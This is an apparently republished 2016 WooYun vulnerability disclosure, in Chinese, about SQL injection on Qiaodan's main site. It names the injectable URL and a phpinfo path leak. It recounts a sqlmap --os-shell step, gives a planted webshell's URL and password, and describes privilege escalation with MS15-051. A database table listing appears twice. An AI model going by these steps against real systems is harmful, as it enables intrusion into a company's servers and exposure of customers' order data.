乔丹主站SQL注入（泄漏大量订单/大量数据/root+dba写入shell/失败的内网漫游）

admin

139701
文章

114
评论

2017年4月22日00:37:18评论352 views字数 238阅读0分47秒阅读模式

摘要

2016-04-08：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-23：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(8) 关注此漏洞

缺陷编号： WooYun-2016-193727

漏洞标题：乔丹主站SQL注入（泄漏大量订单/大量数据/root+dba写入shell/失败的内网漫游）

漏洞作者： DeadSea

提交时间： 2016-04-08 11:02

公开时间： 2016-05-23 11:10

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

2016-04-08：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-23：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

这是我最失败的一次。。。

详细说明：

code 区域

http://qiaodan.com/e/cpdh.php?classid=1

存在注入

root权限

dba权限开启。利用phpinfo泄漏的绝对路径

phpinfo地址:

code 区域

http://www.qiaodan.com/VIP/php.php

绝对路径D:/WWW/VIP/

sqlmap命令 --os-shell

成功写入，上传一句话。我上传了很多都是显示500然后群里的大牛告诉我，显示500不代表不执行，所以就直接拿菜刀连接了。没想到成功连接上了

code 区域

http://www.qiaodan.com/VIP/sea.php 密码0

接下来就是我最失败的地方了。提权

上传了个cmd 没想到，执行失败。

之后各种上传aspx的马，无一例外都给杀了，最后上传了个执行cmd的aspx小脚本

能执行whoami/ipconfig/这些小命令，net user这些查看用户的完全显示不出来，不知道是不是脚本的问题。后来又各种上传exp。就成功了

用了MS15-051 直接获取了sy权限

添加管理员无回显。服务器端口1313

附带一个大黑阔提权成功图

数据

code 区域

Database: u817646
 +--------------------------------+---------+
 | 
 Table                          
 | Entries |
 +--------------------------------+---------+
 | 
 qiaodan_coode                  | 121720751 |
 | 
 qiaodan_vip                    | 524149  |
 | 
 qiaodan_vip_1603               | 524149  |
 | 
 qiaodan_vip_002                | 497357  |
 | 
 qiaodan_vip_151203             | 446909  |
 | 
 qiaodan_vip_1601               | 446909  |
 | 
 qiaodan_vip_1507               | 414938  |
 | 
 qiaodan_vip_150915             | 389539  |
 | 
 qiaodan_vip_151008             | 389539  |
 | 
 qiaodan_vip_1509               | 298000  |
 | 
 qiaodan_vip_1508               | 277857  |
 | 
 qiaodan_ecms_products_data_1   | 16539   |
 | 
 qiaodan_ecms_products_index    | 16539   |
 | 
 qiaodan_products               | 15771   |
 | 
 qiaodan_products55_copy        | 15237   |
 | 
 qiaodan_ecms_products          | 14712   |
 | 
 qiaodan_products2              | 14618   |
 | 
 qiaodan_ecms_products3         | 13712   |
 | 
 qiaodan_ecms_products2         | 13196   |
 | 
 qiaodan_ecms_products_data_1_2 | 13196   |
 | 
 qiaodan_ecms_products_index2   | 13196   |
 | 
 qiaodan_enewsdolog             | 10044   |
 | 
 qiaodan_viprecord              | 6866    |
 | 
 qiaodan_viprecord_copy         | 6356    |
 | 
 qiaodan_shopall_copy           | 5675    |
 | 
 tb_friend                      | 5613    |
 | 
 qiaodan_shopall                | 4992    |
 | 
 tb_game                        | 4692    |
 | 
 qiaodan_hlchange               | 4162    |
 | 
 tb_weibo                       | 3524    |
 | 
 qiaodan_baoming                | 3481    |
 | 
 tb_login                       | 2375    |
 | 
 qiaodan_lpchange               | 2037    |
 | 
 qiaodan_enewslog               | 1166    |
 | 
 tb_score                       | 1022    |
 | 
 tb_user                        | 1021    |
 | 
 qiaodan_enewssearchall         | 379     |
 | 
 tb_goodluck                    | 325     |
 | 
 qiaodan_baoming_copy           | 264     |
 | 
 qiaodan_kuz2013_picture        | 223     |
 | 
 hdzz_products2                 | 212     |
 | 
 hdzz_products                  | 196     |
 | 
 qiaodan_ecms_news              | 178     |
 | 
 qiaodan_ecms_news_data_1       | 178     |
 | 
 qiaodan_ecms_news_index        | 178     |
 | 
 qiaodan_enewsf                 | 176     |
 | 
 town_news_con                  | 175     |
 | 
 town_plus                      | 174     |
 | 
 qiaodan_enewstempbak           | 124     |
 | 
 waterfall                      | 123     |
 | 
 qiaodan_onlinebuy              | 101     |
 | 
 town_plus_set                  | 90      |
 | 
 qiaodan_eight_works            | 89      |
 | 
 qiaodan_enewsfile_1            | 88      |
 | 
 qiaodan_enewsfile_other        | 61      |
 | 
 tb_hys                         | 61      |
 | 
 qiaodan_2013qyh_picture        | 58      |
 | 
 qiaodan_enewstempdt            | 56      |
 | 
 town_news_cat                  | 56      |
 | 
 town_pageset                   | 56      |
 | 
 qiaodan_tech                   | 53      |
 | 
 town_menu                      | 52      |
 | 
 qiaodan_enewsclass             | 49      |
 | 
 qiaodan_enewsclass_copy        | 49      |
 | 
 qiaodan_enewsclass_stats       | 49      |
 | 
 qiaodan_enewsclassadd          | 49      |
 | 
 qiaodan_pinpai                 | 38      |
 | 
 qd_dyy_picture                 | 34      |
 | 
 qiaodan_ecms_tvc               | 33      |
 | 
 qiaodan_ecms_tvc_data_1        | 33      |
 | 
 qiaodan_ecms_tvc_index         | 33      |
 | 
 town_admin_auth                | 32      |
 | 
 town_admin_rights              | 31      |
 | 
 qiaodan_enewsbq                | 24      |
 | 
 town_link                      | 24      |
 | 
 qd_dyy_pro                     | 23      |
 | 
 town_form                      | 23      |
 | 
 qiaodan_eight_win              | 21      |
 | 
 qiaodan_lp                     | 21      |
 | 
 town_config                    | 21      |
 | 
 town_member_regform            | 21      |
 | 
 qiaodan_ecms_vip               | 19      |
 | 
 qiaodan_ecms_vip_data_1        | 19      |
 | 
 qiaodan_ecms_vip_index         | 19      |
 | 
 qiaodan_enewsad                | 19      |
 | 
 qiaodan_enewspage              | 19      |
 | 
 qiaodan_pinpai2                | 18      |
 | 
 qiaodan_enewslisttemp          | 16      |
 | 
 town_default_rights            | 16      |
 | 
 town_news_auth                 | 16      |
 | 
 qiaodan_enewsbqtemp            | 15      |
 | 
 qiaodan_pinpai_copy            | 15      |
 | 
 qiaodan_enewsnewstemp          | 14      |
 | 
 qiaodan_enewstempvar           | 14      |
 | 
 qiaodan_enewsmod               | 13      |
 | 
 qiaodan_enewstable             | 13      |
 | 
 town_stat_date                 | 12      |
 | 
 qiaodan_hl                     | 11      |
 | 
 daiyan                         | 10      |
 | 
 qiaodan_enewsclassnavcache     | 10      |
 | 
 qiaodan_seo                    | 10      |
 | 
 qiaodan_enewsfeedbackf         | 9       |
 | 
 town_coltype                   | 9       |
 | 
 town_member_rights             | 9       |
 | 
 town_secure                    | 9       |
 | 
 qiaodan_enewsclasstemp         | 8       |
 | 
 qiaodan_2013lzmarathon_picture | 7       |
 | 
 qiaodan_2013lzmarathon_seo     | 7       |
 | 
 qiaodan_enewspagetemp          | 7       |
 | 
 qiaodan_kuz2013_seo            | 7       |
 | 
 town_link_cat                  | 7       |
 | 
 qd_dyy_seo                     | 6       |
 | 
 qiaodan_2013lzmarathon_intro   | 6       |
 | 
 qiaodan_enewsshoppayfs         | 6       |
 | 
 qiaodan_gundong                | 6       |
 | 
 qiaodan_techclass              | 6       |
 | 
 town_advs_lb                   | 6       |
 | 
 town_member_func               | 6       |
 | 
 fengxing2_seo                  | 5       |
 | 
 qb_jfabout                     | 5       |
 | 
 qiaodan_enewsadclass           | 5       |
 | 
 qiaodan_enewsmemberf           | 5       |
 | 
 qiaodan_enewsnotcj             | 5       |
 | 
 town_cp_con                    | 5       |
 | 
 town_poll_data                 | 5       |
 | 
 `2012_seo`                     | 4       |
 | 
 hdzz_seo                       | 4       |
 | 
 qiaodan_admin                  | 4       |
 | 
 qiaodan_ecms_kuz               | 4       |
 | 
 qiaodan_ecms_kuz_data_1        | 4       |
 | 
 qiaodan_ecms_kuz_index         | 4       |
 | 
 qiaodan_enewsbqclass           | 4       |
 | 
 qiaodan_enewsplayer            | 4       |
 | 
 qiaodan_enewsshopps            | 4       |
 | 
 qiaodan_enewsuser              | 4       |
 | 
 qiaodan_enewsuseradd           | 4       |
 | 
 qiaodan_enewsuserloginck       | 4       |
 | 
 town_comment_cat               | 4       |
 | 
 qiaodan_ecms_zhanji            | 3       |
 | 
 qiaodan_ecms_zhanji_data_1     | 3       |
 | 
 qiaodan_ecms_zhanji_index      | 3       |
 | 
 qiaodan_enewsgroup             | 3       |
 | 
 qiaodan_enewspayapi            | 3       |
 | 
 qiaodan_enewsqmsg              | 3       |
 | 
 qiaodan_enewsvotetemp          | 3       |
 | 
 qiaodan_sina                   | 3       |
 | 
 tb_qqid                        | 3       |
 | 
 tb_reason                      | 3       |
 | 
 town_duty                      | 3       |
 | 
 qb_jfsort                      | 2       |
 | 
 qiaodan_enewsadminstyle        | 2       |
 | 
 qiaodan_enewsloginfail         | 2       |
 | 
 qiaodan_enewsmemberform        | 2       |
 | 
 qiaodan_enewspageclass         | 2       |
 | 
 qiaodan_enewspltemp            | 2       |
 | 
 qiaodan_enewsspacestyle        | 2       |
 | 
 qiaodan_enewsuserlist          | 2       |
 | 
 qiaodan_enewsuserlistclass     | 2       |
 | 
 qiaodan_enewswapstyle          | 2       |
 | 
 town_advs_page                 | 2       |
 | 
 town_cp_cat                    | 2       |
 | 
 town_down_cat                  | 2       |
 | 
 town_logo                      | 2       |
 | 
 town_member_type               | 2       |
 | 
 qiaodan_enewsclass_stats_set   | 1       |
 | 
 qiaodan_enewsclassf            | 1       |
 | 
 qiaodan_enewsdo                | 1       |
 | 
 qiaodan_enewsfeedbackclass     | 1       |
 | 
 qiaodan_enewsgbookclass        | 1       |
 | 
 qiaodan_enewsindexpage         | 1       |
 | 
 qiaodan_enewsjstemp            | 1       |
 | 
 qiaodan_enewslisttempclass     | 1       |
 | 
 qiaodan_enewsmember            | 1       |
 | 
 qiaodan_enewsmemberadd         | 1       |
 | 
 qiaodan_enewsmembergroup       | 1       |
 | 
 qiaodan_enewspicclass          | 1       |
 | 
 qiaodan_enewspl_set            | 1       |
 | 
 qiaodan_enewspostserver        | 1       |
 | 
 qiaodan_enewsprinttemp         | 1       |
 | 
 qiaodan_enewspublic            | 1       |
 | 
 qiaodan_enewspublic_update     | 1       |
 | 
 qiaodan_enewspubtemp           | 1       |
 | 
 qiaodan_enewssearchall_load    | 1       |
 | 
 qiaodan_enewssearchtemp        | 1       |
 | 
 qiaodan_enewsshop_set          | 1       |
 | 
 qiaodan_enewstempgroup         | 1       |
 | 
 qiaodan_session                | 1       |
 | 
 qiaodan_vipuser                | 1       |
 | 
 town_admin                     | 1       |
 | 
 town_advs_dl                   | 1       |
 | 
 town_advs_float                | 1       |
 | 
 town_advs_left                 | 1       |
 | 
 town_advs_pop                  | 1       |
 | 
 town_advs_right                | 1       |
 | 
 town_member                    | 1       |
 | 
 town_member_notice             | 1       |
 | 
 town_poll_config               | 1       |
 |
 town_poll_index                | 1       |
 | 
 town_stat_base                 | 1       |
 | 
 town_weather                   | 1       ||
 +--------------------------------+---------+

还有许多sql注入就不贴出来了.

漏洞证明：

code 区域

Database: u817646
 +--------------------------------+---------+
 | 
 Table                          
 | Entries |
 +--------------------------------+---------+
 | 
 qiaodan_coode                  | 121720751 |
 | 
 qiaodan_vip                    | 524149  |
 | 
 qiaodan_vip_1603               | 524149  |
 | 
 qiaodan_vip_002                | 497357  |
 | 
 qiaodan_vip_151203             | 446909  |
 | 
 qiaodan_vip_1601               | 446909  |
 | 
 qiaodan_vip_1507               | 414938  |
 | 
 qiaodan_vip_150915             | 389539  |
 | 
 qiaodan_vip_151008             | 389539  |
 | 
 qiaodan_vip_1509               | 298000  |
 | 
 qiaodan_vip_1508               | 277857  |
 | 
 qiaodan_ecms_products_data_1   | 16539   |
 | 
 qiaodan_ecms_products_index    | 16539   |
 | 
 qiaodan_products               | 15771   |
 | 
 qiaodan_products55_copy        | 15237   |
 | 
 qiaodan_ecms_products          | 14712   |
 | 
 qiaodan_products2              | 14618   |
 | 
 qiaodan_ecms_products3         | 13712   |
 | 
 qiaodan_ecms_products2         | 13196   |
 | 
 qiaodan_ecms_products_data_1_2 | 13196   |
 | 
 qiaodan_ecms_products_index2   | 13196   |
 | 
 qiaodan_enewsdolog             | 10044   |
 | 
 qiaodan_viprecord              | 6866    |
 | 
 qiaodan_viprecord_copy         | 6356    |
 | 
 qiaodan_shopall_copy           | 5675    |
 | 
 tb_friend                      | 5613    |
 | 
 qiaodan_shopall                | 4992    |
 | 
 tb_game                        | 4692    |
 | 
 qiaodan_hlchange               | 4162    |
 | 
 tb_weibo                       | 3524    |
 | 
 qiaodan_baoming                | 3481    |
 | 
 tb_login                       | 2375    |
 | 
 qiaodan_lpchange               | 2037    |
 | 
 qiaodan_enewslog               | 1166    |
 | 
 tb_score                       | 1022    |
 | 
 tb_user                        | 1021    |
 | 
 qiaodan_enewssearchall         | 379     |
 | 
 tb_goodluck                    | 325     |
 | 
 qiaodan_baoming_copy           | 264     |
 | 
 qiaodan_kuz2013_picture        | 223     |
 | 
 hdzz_products2                 | 212     |
 | 
 hdzz_products                  | 196     |
 | 
 qiaodan_ecms_news              | 178     |
 | 
 qiaodan_ecms_news_data_1       | 178     |
 | 
 qiaodan_ecms_news_index        | 178     |
 | 
 qiaodan_enewsf                 | 176     |
 | 
 town_news_con                  | 175     |
 | 
 town_plus                      | 174     |
 | 
 qiaodan_enewstempbak           | 124     |
 | 
 waterfall                      | 123     |
 | 
 qiaodan_onlinebuy              | 101     |
 | 
 town_plus_set                  | 90      |
 | 
 qiaodan_eight_works            | 89      |
 | 
 qiaodan_enewsfile_1            | 88      |
 | 
 qiaodan_enewsfile_other        | 61      |
 | 
 tb_hys                         | 61      |
 | 
 qiaodan_2013qyh_picture        | 58      |
 | 
 qiaodan_enewstempdt            | 56      |
 | 
 town_news_cat                  | 56      |
 | 
 town_pageset                   | 56      |
 | 
 qiaodan_tech                   | 53      |
 | 
 town_menu                      | 52      |
 | 
 qiaodan_enewsclass             | 49      |
 | 
 qiaodan_enewsclass_copy        | 49      |
 | 
 qiaodan_enewsclass_stats       | 49      |
 | 
 qiaodan_enewsclassadd          | 49      |
 | 
 qiaodan_pinpai                 | 38      |
 | 
 qd_dyy_picture                 | 34      |
 | 
 qiaodan_ecms_tvc               | 33      |
 | 
 qiaodan_ecms_tvc_data_1        | 33      |
 | 
 qiaodan_ecms_tvc_index         | 33      |
 | 
 town_admin_auth                | 32      |
 | 
 town_admin_rights              | 31      |
 | 
 qiaodan_enewsbq                | 24      |
 | 
 town_link                      | 24      |
 | 
 qd_dyy_pro                     | 23      |
 | 
 town_form                      | 23      |
 | 
 qiaodan_eight_win              | 21      |
 | 
 qiaodan_lp                     | 21      |
 | 
 town_config                    | 21      |
 | 
 town_member_regform            | 21      |
 | 
 qiaodan_ecms_vip               | 19      |
 | 
 qiaodan_ecms_vip_data_1        | 19      |
 | 
 qiaodan_ecms_vip_index         | 19      |
 | 
 qiaodan_enewsad                | 19      |
 | 
 qiaodan_enewspage              | 19      |
 | 
 qiaodan_pinpai2                | 18      |
 | 
 qiaodan_enewslisttemp          | 16      |
 | 
 town_default_rights            | 16      |
 | 
 town_news_auth                 | 16      |
 | 
 qiaodan_enewsbqtemp            | 15      |
 | 
 qiaodan_pinpai_copy            | 15      |
 | 
 qiaodan_enewsnewstemp          | 14      |
 | 
 qiaodan_enewstempvar           | 14      |
 | 
 qiaodan_enewsmod               | 13      |
 | 
 qiaodan_enewstable             | 13      |
 | 
 town_stat_date                 | 12      |
 | 
 qiaodan_hl                     | 11      |
 | 
 daiyan                         | 10      |
 | 
 qiaodan_enewsclassnavcache     | 10      |
 | 
 qiaodan_seo                    | 10      |
 | 
 qiaodan_enewsfeedbackf         | 9       |
 | 
 town_coltype                   | 9       |
 | 
 town_member_rights             | 9       |
 | 
 town_secure                    | 9       |
 | 
 qiaodan_enewsclasstemp         | 8       |
 | 
 qiaodan_2013lzmarathon_picture | 7       |
 | 
 qiaodan_2013lzmarathon_seo     | 7       |
 | 
 qiaodan_enewspagetemp          | 7       |
 | 
 qiaodan_kuz2013_seo            | 7       |
 | 
 town_link_cat                  | 7       |
 | 
 qd_dyy_seo                     | 6       |
 | 
 qiaodan_2013lzmarathon_intro   | 6       |
 | 
 qiaodan_enewsshoppayfs         | 6       |
 | 
 qiaodan_gundong                | 6       |
 | 
 qiaodan_techclass              | 6       |
 | 
 town_advs_lb                   | 6       |
 | 
 town_member_func               | 6       |
 | 
 fengxing2_seo                  | 5       |
 | 
 qb_jfabout                     | 5       |
 | 
 qiaodan_enewsadclass           | 5       |
 | 
 qiaodan_enewsmemberf           | 5       |
 | 
 qiaodan_enewsnotcj             | 5       |
 | 
 town_cp_con                    | 5       |
 | 
 town_poll_data                 | 5       |
 | 
 `2012_seo`                     | 4       |
 | 
 hdzz_seo                       | 4       |
 | 
 qiaodan_admin                  | 4       |
 | 
 qiaodan_ecms_kuz               | 4       |
 | 
 qiaodan_ecms_kuz_data_1        | 4       |
 | 
 qiaodan_ecms_kuz_index         | 4       |
 | 
 qiaodan_enewsbqclass           | 4       |
 | 
 qiaodan_enewsplayer            | 4       |
 | 
 qiaodan_enewsshopps            | 4       |
 | 
 qiaodan_enewsuser              | 4       |
 | 
 qiaodan_enewsuseradd           | 4       |
 | 
 qiaodan_enewsuserloginck       | 4       |
 | 
 town_comment_cat               | 4       |
 | 
 qiaodan_ecms_zhanji            | 3       |
 | 
 qiaodan_ecms_zhanji_data_1     | 3       |
 | 
 qiaodan_ecms_zhanji_index      | 3       |
 | 
 qiaodan_enewsgroup             | 3       |
 | 
 qiaodan_enewspayapi            | 3       |
 | 
 qiaodan_enewsqmsg              | 3       |
 | 
 qiaodan_enewsvotetemp          | 3       |
 | 
 qiaodan_sina                   | 3       |
 | 
 tb_qqid                        | 3       |
 | 
 tb_reason                      | 3       |
 | 
 town_duty                      | 3       |
 | 
 qb_jfsort                      | 2       |
 | 
 qiaodan_enewsadminstyle        | 2       |
 | 
 qiaodan_enewsloginfail         | 2       |
 | 
 qiaodan_enewsmemberform        | 2       |
 | 
 qiaodan_enewspageclass         | 2       |
 | 
 qiaodan_enewspltemp            | 2       |
 | 
 qiaodan_enewsspacestyle        | 2       |
 | 
 qiaodan_enewsuserlist          | 2       |
 | 
 qiaodan_enewsuserlistclass     | 2       |
 | 
 qiaodan_enewswapstyle          | 2       |
 | 
 town_advs_page                 | 2       |
 | 
 town_cp_cat                    | 2       |
 | 
 town_down_cat                  | 2       |
 | 
 town_logo                      | 2       |
 | 
 town_member_type               | 2       |
 | 
 qiaodan_enewsclass_stats_set   | 1       |
 | 
 qiaodan_enewsclassf            | 1       |
 | 
 qiaodan_enewsdo                | 1       |
 | 
 qiaodan_enewsfeedbackclass     | 1       |
 | 
 qiaodan_enewsgbookclass        | 1       |
 | 
 qiaodan_enewsindexpage         | 1       |
 | 
 qiaodan_enewsjstemp            | 1       |
 | 
 qiaodan_enewslisttempclass     | 1       |
 | 
 qiaodan_enewsmember            | 1       |
 | 
 qiaodan_enewsmemberadd         | 1       |
 | 
 qiaodan_enewsmembergroup       | 1       |
 | 
 qiaodan_enewspicclass          | 1       |
 | 
 qiaodan_enewspl_set            | 1       |
 | 
 qiaodan_enewspostserver        | 1       |
 | 
 qiaodan_enewsprinttemp         | 1       |
 | 
 qiaodan_enewspublic            | 1       |
 | 
 qiaodan_enewspublic_update     | 1       |
 | 
 qiaodan_enewspubtemp           | 1       |
 | 
 qiaodan_enewssearchall_load    | 1       |
 | 
 qiaodan_enewssearchtemp        | 1       |
 | 
 qiaodan_enewsshop_set          | 1       |
 | 
 qiaodan_enewstempgroup         | 1       |
 | 
 qiaodan_session                | 1       |
 | 
 qiaodan_vipuser                | 1       |
 | 
 town_admin                     | 1       |
 | 
 town_advs_dl                   | 1       |
 | 
 town_advs_float                | 1       |
 | 
 town_advs_left                 | 1       |
 | 
 town_advs_pop                  | 1       |
 | 
 town_advs_right                | 1       |
 | 
 town_member                    | 1       |
 | 
 town_member_notice             | 1       |
 | 
 town_poll_config               | 1       |
 |
 town_poll_index                | 1       |
 | 
 town_stat_base                 | 1       |
 | 
 town_weather                   | 1       ||
 +--------------------------------+---------+

修复方案：

版权声明：转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-08 17:52 | Mr.li ( 普通白帽子 | Rank:106 漏洞数:8 | 爱萌妹子的骚年~)

1

是不会认领的…… 乌云里面已经报N次乔丹的问题，而且都是sql注入，然后……

1# 回复此人

乔丹主站SQL注入（泄漏大量订单/大量数据/root+dba写入shell/失败的内网漫游）

漏洞概要关注数(8) 关注此漏洞

缺陷编号： WooYun-2016-193727

漏洞标题：乔丹主站SQL注入（泄漏大量订单/大量数据/root+dba写入shell/失败的内网漫游）

相关厂商：乔丹

漏洞作者： DeadSea

提交时间： 2016-04-08 11:02

公开时间： 2016-05-23 11:10

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org-优酷多个分站存在SSRF漏洞大礼包

WooYun.org-优特捷某内部邮箱账户外泄涉及大量敏感信息(多家合作单位躺枪)

WooYun.org-某网平行权限漏洞（影响所有使用用户）

Bypass分享 | 形而上学，不行退学的一句话

格兰仕千万数据库信息泄露

3399游戏源码下载

WEFANS喂饭后台弱口令

国家电网某充电APP系统Getshell涉及大量用户敏感信息

威锋网游戏站存在SQL注入（含多重绕过+编码）

APP安全之三维度从一个毫无用处的xss到获取大量身份证信息图片(包括李刚身份证)

发表评论

在线咨询

微信

漏洞概要 关注数(8) 关注此漏洞

缺陷编号： WooYun-2016-193727

漏洞标题： 乔丹主站SQL注入（泄漏大量订单/大量数据/root+dba写入shell/失败的内网漫游）

相关厂商： 乔丹

漏洞作者： DeadSea

提交时间： 2016-04-08 11:02

公开时间： 2016-05-23 11:10

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(8) 关注此漏洞

漏洞标题：乔丹主站SQL注入（泄漏大量订单/大量数据/root+dba写入shell/失败的内网漫游）

相关厂商：乔丹

危害等级：高

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分